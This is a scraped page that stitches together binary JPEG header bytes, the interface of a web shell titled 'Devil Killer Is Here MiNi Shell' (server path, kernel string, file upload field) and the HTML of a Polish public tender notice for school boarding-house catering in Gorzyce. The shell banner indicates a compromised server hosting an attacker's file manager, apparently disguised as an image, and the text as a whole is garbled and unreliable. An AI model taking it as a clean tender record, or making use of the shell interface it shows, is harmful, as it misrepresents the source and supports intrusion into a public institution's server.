JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240808/0045121601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przygotowanie i dostarczanie posiłków dla uczniów - mieszkańców internatu Zespołu Szkół im.por.J.Sarny w Gorzycach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół im. por. J. Sarny w Gorzycach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000037210</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żwirki i Wigury 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gorzyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-432</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">158362087</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">158362087</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zsgorzyce@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zsgorzyce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przygotowanie i dostarczanie posiłków dla uczniów - mieszkańców internatu Zespołu Szkół im.por.J.Sarny w Gorzycach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3114d287-66d4-4e09-834f-b48d85894d0a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00451216</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00448379/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przygotowanie i dostarczanie posiłków dla uczniów - mieszkańców internatu Zespołu Szkół im.por.J.Sarny w Gorzycach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3114d287-66d4-4e09-834f-b48d85894d0a <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/ i formularza ePUAPu https://epuap.gov.pl/wps/portal „Wyślij wiadomość do zamawiającego”</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>Postępowanie można wyszukać na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze<br/>strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ogólnego rozporządzenia o ochronie<br/>danych osobowych z dnia 27 kwietnia 2016r. (Dz. Urz. UE L 119 z 04.05.2016) informujemy, że:<br/>1. administratorem Pani/Pana danych osobowych jest Zespół Szkół im. por. J. Sarny w Gorzycach z<br/>siedzibą przy ul. Żwirki i Wigury 2; 39-432 Gorzyce, tel. (48) 15 836 20 87, adres e-mail:<br/>zsgorzyce@wp.pl;<br/>2. kontakt z Inspektorem Ochrony Danych Panią Małgorzatą Urbaniak – Zespół Szkół im. por. J. Sarny<br/>w Gorzycach z siedzibą przy ul. Żwirki i Wigury 2; 39-432 Gorzyce.<br/>3. Pani/Pana dane osobowe przetwarzane będą w celu realizacji ustawowych zadań urzędu - na<br/>podstawie art. 6 ust. 1 lit. b, c ogólnego rozporządzenia o ochronie danych osobowych z dnia 27<br/>kwietnia 2016r. oraz na podstawie Art. 9 ust 2 lit a ogólnego rozporządzenia o ochronie danych<br/>osobowych z dnia 27 kwietnia 2016r.;<br/>4. odbiorcami Pani/Pana danych osobowych będą wyłącznie podmioty uprawnione do uzyskania<br/>danych osobowych na podstawie przepisów prawa;<br/>5. Pani/Pana dane osobowe przechowywane będą w czasie określonym przepisami prawa, zgodnie z<br/>instrukcją kancelaryjną;<br/>6. posiada Pani/Pan na podstawie art. 15 RODO prawo do żądania od administratora dostępu do<br/>danych osobowych<br/>- na podstawie art. 16 RODO prawo do ich sprostowania*<br/>- na podstawie art.18 RODO prawo do ograniczenia przetwarzania prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO **;<br/>7. ma Pani/Pan prawo wniesienia skargi do organu nadzorczego ( tj. Prezesa Urzędu Ochrony Danych<br/>Osobowych);<br/>8. nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą<br/>Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w<br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwa członkowskiego. Zamawiający dodatkowo informuje, że: Wykonawca ubiegający się o<br/>udzielenie zamówienia publicznego jest zobowiązany do wypełnienia obowiązków informacyjnych<br/>przewidzianych w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe<br/>bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w<br/>niniejszym postępowaniu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający nie planuje przetwarzania danych<br/>osobowych wykonawcy w celu innym niż cel określony powyżej. Jeżeli administrator będzie planował<br/>przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel<br/>określony w ppkt 2) powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane<br/>dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w<br/>art. 13 ust. 2 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZS.01.08.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1024605,40 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa cateringowa polegająca na przygotowaniu i dostarczaniu posiłków dla uczniów - mieszkańców internatu Zespołu Szkół im.por.J.Sarny w Gorzycach. <br/>1. Catering obejmuje całodzienne wyżywienie dla wychowanków internatu Zespołu Szkół w Gorzycach. W realizacji przedmiotu zamówienia Wykonawcę obowiązuje „System HACCP” regulowany: Ustawą z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2017 r. poz. 149 z późn. zm.) oraz rozporządzenia ministra zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz. U. 2016 poz. 1154) a także przepisami Unii Europejskiej w zakresie bezpieczeństwa żywności. <br/>2. Posiłki muszą być urozmaicone, odpowiadające normom zarówno pod względem ilości, jak i jakości oraz wartości odżywczych, bogate w witaminy, dużą ilość warzyw i owoców. Wykonawca musi gwarantować przygotowanie różnego rodzaju diet zgodnie z zaleceniem lekarza. Posiłki powinny spełniać Zasady Racjonalnego Żywienia<br/>3. Posiłki muszą spełniać zalecane normy żywności i żywienia dla młodzieży w przedziale wiekowym od 14 do 20 lat.<br/>Wykonawca zobowiązany jest:<br/>a) zapewnić ciągłość usługi żywienia,<br/>b) do dostarczania posiłków płynnych (zupy, sosy, napoje) w szczelnie zamkniętych pojemnikach (termosach), które są zabezpieczone przed otwarciem i uniemożliwiają wylanie zawartości oraz zapewniają utrzymanie odpowiedniej temperatury posiłku;<br/>c) do dostarczania posiłków stałych w zamykanych zbiorczych pojemnikach (termosach), zabezpieczonych przed otwarciem i uniemożliwiające wysypanie się zawartości oraz zapewniają utrzymanie odpowiedniej temperatury posiłku;<br/>d) zapewnić odpowiednią ilość termosów i opakowań zbiorczych niezbędnych do przewozu posiłków gwarantujących właściwą temperaturę i ochronę oraz jakość przewożonych potraw wraz z ich myciem, wyparzaniem oraz ich odbiór; posiłki serwowane na gorąco powinny być transportowane w pojemnikach, które utrzymują temperaturę wewnątrz + 60oC, a ich czas przewozu nie przekroczy 0,5 godziny;<br/>e) do przygotowania obiadów składających się z dwóch dań: zupa i drugie danie (posiłki mają być gorące) oraz kompotu; temperatura dostarczonych gorących posiłków nie może być niższa niż + 60ºC;<br/>f) wydawania posiłków oraz odbioru i mycia (wyparzania) naczyń po posiłkach <br/>g) wykonywania przedmiotu zamówienia przy wykorzystaniu wykwalifikowanego personelu, tym osób przygotowujących i dostarczających posiłki, posiadających aktualne orzeczenie lekarskie potwierdzone wpisem w książeczce sanitarno-epidemiologicznej oraz przeszkolenie w zakresie przepisów BHP i p.poż.;<br/>Zamawiający nie dopuszcza wykonywania posiłków z półproduktów; przygotowanie i podanie posiłku z półproduktu będzie stanowiło rażące naruszenie postanowień niniejszego ogłoszenia o zamówieniu i warunków umowy oraz będzie uprawniało Zamawiającego do natychmiastowego rozwiązania umowy z naliczeniem kary umownej.<br/>Zamawiający zastrzega że również nieprzestrzeganie terminowości dostarczania posiłków jak również odpowiedniej gramatury i jakości posiłków skutkować będzie możliwością rozwiązania umowy po wcześniejszym pisemnym zawiadomieniu o możliwości rozwiązania umowy <br/>Produkty wykorzystywane do przygotowywania posiłków muszą spełniać Normy Żywienia opracowane przez Instytut Żywności i Żywienia, być świeże tj. posiadać ważny termin przydatności do spożycia i nie mogą być genetycznie modyfikowane; <br/>Wykonawca jako zakład prowadzący działalność w zakresie produkcji posiłków musi posiadać Decyzję wydaną przez właściwego miejscowo Państwowego Inspektora Sanitarnego na podstawie przepisów ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t. j. Dz.U. z 2020 r. poz. 2021); Uwaga: Decyzja powinna być wydana na produkcję żywności oraz dystrybucję żywności w ramach cateringu (m.in. ze względu na potrzebę uwzględnienia przepisów w zakresie warunków transportu żywności, dezynfekcji pojemników do przewożenia żywności). 4. Zestaw dzienny przypadający na 1 osobę to co najmniej cztery posiłki każdego dnia:<br/>- I śniadanie<br/>- II śniadanie<br/>- obiad (I danie, II danie i co najmniej kompot)<br/>- kolacja<br/>Dopuszcza się jednoczesne wydanie I i II śniadania<br/>5. Łączna wartość energetyczna posiłku o którym mowa w punkcie 1 nie może być niższa niż 3200 kcal.<br/>6. Wykonawca dostarczy gotowe posiłki do dwóch wyznaczonych pomieszczeń w siedzibie internatu mieszczącego się pod adresem: ul. 11 Listopada 12 w Gorzycach zgodnie z następującym harmonogramem:<br/>Dni robocze (poniedziałek – piątek)<br/>Śniadanie (I i II) – 6:30 – 7:00<br/>Obiad – 15:00 – 15:30<br/>Kolacja – 18:30 – 19:00<br/>Sobota, niedziela lub święta<br/>Śniadanie (I i II) – 7:30 – 8:00<br/>Obiad – 14:30 – 15:00<br/>Kolacja – 18:30 – 19:00<br/>7. Zamawiający dopuszcza inne godziny wydawania posiłków w sytuacjach szczególnych. 8. Wykonawca przedkłada Zamawiającemu projekt jadłospisu dekadowy z zaznaczeniem rodzajowo - wagowych wartości porcji na kolejny okres dekady, jadłospis jest przedstawiany do wglądu na trzy dni przed końcem trwającej dekady, jednak w przypadku, gdy Zamawiający zgłosi uwagi w jadłospisie, Wykonawca zobowiązany jest dostosować się do tych uwag i naniesienia właściwych zmian.<br/>9. Zamawiający będzie wymagał od Wykonawcy, aby w ramach realizowanego zamówienia zapewnił posiłki dla wychowanków specjalnej diety (bezglutenowej, ze skazą białkową, z alergią pokarmową lub innymi schorzeniami pokarmowymi).<br/>10. Wykonawca będzie wydawał posiłki w swoich naczyniach i zadba o ich czystość we własnym zakresie. Dopuszcza się stosowanie naczyń jednorazowych.<br/>11. W celu zapewnienia właściwej higieny i jakości wydawanych i przechowywanych posiłków Wykonawca w ramach realizowanego zamówienia wstawi do pomieszczeń jadalnych internatu na swój koszt zamykanych pojemników na resztki, dwie zmywarki do mycia naczyń i sztućców (nie dotyczy w przypadku stosowania naczyń jednorazowych), dwie lodówki do przechowywania posiłków, komplet sztućców (nóż, widelec, łyżka, mała łyżeczka) oraz komplet naczyń (talerz głęboki, talerz płaski, mały talerzyk) lub na każdy posiłek sztućce i naczynia jednorazowe dla każdego z wychowanków. Wstawione urządzenia, naczynia i sztućce pozostają własnością Wykonawcy i podlegają zwrotowi po zakończeniu świadczenia usługi. Wykonawca ponosi całkowite koszty związane z użytkowaniem wstawionych urządzeń.<br/>12. Wykonawca na bieżąco wymieni uszkodzone w wyniku eksploatacji sprzęty, talerze i sztućce na swój koszt. Będzie dostarczał także w ramach usługi środki chemiczne służące do mycia naczyń w zmywarkach.<br/>13. Łączna szacunkowa liczba dni, w których będą wydawane posiłki wynosi 266.<br/>14. Łączna szacunkowa liczba wychowanków spożywających posiłek każdego dnia wynosi 130<br/>15. Zamawiający zastrzega możliwość zwiększenia lub zmniejszenia ilości dostarczanych posiłków danego dnia według potrzeb Zamawiającego, w zależności od frekwencji wychowanków.<br/>16. Wykonawca zobowiązany będzie zapewnić ilość posiłków zgodną z zapotrzebowaniem złożonym na dany dzień przez upoważnionego przedstawiciela Zamawiającego do godz. 20:00 dnia poprzedniego. O liczbie posiłków w danym dniu Wykonawca będzie informowany telefonicznie.<br/>17. Zamawiający zastrzega możliwość ograniczenia ilości dostarczanych posiłków, czasowego wstrzymania ich dostawy lub wcześniejszego zakończenia realizowanej usługi w związku ze zmianą ilości wychowanków w internacie, ich wyjazdami do domu realizowanymi zgodnie z kalendarzem organizacji roku szkolnego oraz rezygnacją czasową lub stałą z pobytu w internacie a także w związku z zawieszeniem zajęć spowodowanym działaniem siły wyższej takim jak np.: klęski żywiołowe lub stany epidemiologiczne.<br/>18. W związku ze wzrostem ilości wychowanków Zamawiający zastrzega także możliwość wzrostu ilości zamawianych posiłków. <br/>19. Ceny zaoferowane przez Wykonawcę nie ulegną podwyższeniu przez cały okres obowiązywania umowy.<br/>20. Wykonawca zobowiązany jest uwzględnić w zaoferowanej cenie wszelkie koszty związane z przedmiotem zamówienia: koszty osprzętu (termosy, pojemniki itd.), koszty transportu i wniesienia, koszty przygotowania posiłków we własnym lokalu przez osoby posiadające odpowiednie kwalifikacje i przeszkolone w przyrządzaniu posiłków<br/>21. Wynagrodzenie Wykonawcy będzie określane na podstawie ilościowego rozliczenia rzeczywiście wydanych posiłków w oparciu o cenę jednostkową zadeklarowaną w ofercie Wykonawcy.<br/>22. Wykonawca zobowiązany jest prowadzić Ewidencję dostarczanych posiłków według ustalonego z Zamawiającym wzoru i przekładać ją do podpisu kierownikowi internatu lub osoby upoważnionej w każdym dniu dostawy. Ewidencja stanowi potwierdzenie daty, godziny oraz ilości dostarczonych posiłków.<br/>23. W zakresie realizacji dostawy posiłków współpracą z Wykonawcą będzie się zajmował kierownik internatu lub osoba upoważniona.<br/> 24. Wykonawca zobowiązany jest do wyznaczenia stałego przedstawiciela odpowiedzialnego za kontakt z Zamawiającym.<br/>25. Wykonawca zobowiązany jest do przechowywania próbek żywnościowych zgodnie z obowiązującymi przepisami.<br/>26. Wykonawca zobowiązany jest do zabrania resztek pokonsumpcyjnych.<br/>27. Rozliczenie usługi będzie rozliczane w trybie miesięcznym. Wykonawca dostarczy Zamawiającemu fakturę sporządzoną na podstawie Ewidencji dostarczonych posiłków w terminie nie dłuższym niż do piątego dnia miesiące następnego z datą płatności nie krótszą niż 10 dni. Ewidencja dostarczonych posiłków stanowi konieczny załącznik do faktury. Z faktury powinno wynikać w sposób jednoznaczny, celem określenia prawidłowości rozliczenia, za ile wydanych posiłków w ciągu miesiąca wystawiono fakturę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55524000-9 - Usługi dostarczania posiłków do szkół</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55523100-3 - Usługi w zakresie posiłków szkolnych</p> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje możliwość instytucji wznowienia postępowania w kolejnym roku szkolnym 2025/2026 <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>a) zdolności do występowania w obrocie gospodarczym (art. 113):<br/>Zamawiający nie stawia warunku w powyższym 